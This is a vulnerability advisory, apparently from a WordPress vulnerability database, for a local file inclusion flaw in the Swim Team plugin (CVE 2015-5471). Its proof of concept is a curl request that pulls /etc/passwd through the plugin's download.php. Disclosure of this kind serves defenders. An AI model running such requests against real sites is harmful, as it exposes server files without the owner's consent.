Swim Team <= v1.44.10777 - Local File Inclusion

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files.
Proof of Concept
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"

Affects

Plugin wp-swimteam
fixed in version 1.45

References

CVE 2015-5471
PACKETSTORM 132653
URL http://www.vapid.dhs.org/advisory.php?v=134
URL https://wordpress.org/support/topic/security-vulnerability-6?replies=3#post-7141123

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapid.dhs.org
Submitter Twitter _larry0
Views 225
Verified No
WPVDB ID 8071

Timeline

Publicly Published 2015-07-03 (over 1 year ago)
Added 2015-07-03 (over 1 year ago)
Last Updated 2015-07-13 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.